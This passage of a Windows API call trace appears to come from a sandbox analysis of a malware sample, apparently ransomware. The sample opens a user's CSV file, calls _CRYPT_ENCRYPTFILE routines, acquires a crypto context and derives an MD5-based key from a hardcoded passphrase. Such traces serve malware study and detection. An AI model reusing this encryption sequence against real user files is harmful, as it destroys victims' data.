Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0082.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0082.920] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\kdeophxr4d.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0082.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0082.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0082.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da578 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.922] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4508 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.964] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.964] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.965] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0082.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da578 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cb0d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0082.968] CloseHandle (hObject=0x258) returned 1 [0082.968] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.968] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0082.968] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\kDeOPhXR4D.csv", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49be8ab0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xc4079560, ftLastAccessTime.dwHighDateTime=0x1d5e757, ftLastWriteTime.dwLowDateTime=0xc4079560, ftLastWriteTime.dwHighDateTime=0x1d5e757, nFileSizeHigh=0x0, nFileSizeLow=0x10d72, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="kDeOPhXR4D.csv", cAlternateFileName="KDEOPH~1.CSV")) returned 0x41ac440 [0082.968] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0082.968] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.969] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0082.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0082.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0082.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0082.969] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a4a58) returned 1 [0082.970] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0082.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.970] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0082.970] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.971] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.971] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.972] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.972] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.972] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43c3818, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0082.972] CryptCreateHash (in: hProv=0x41a4a58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0082.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.973] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0082.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.973] CharUpperBuffW (in: 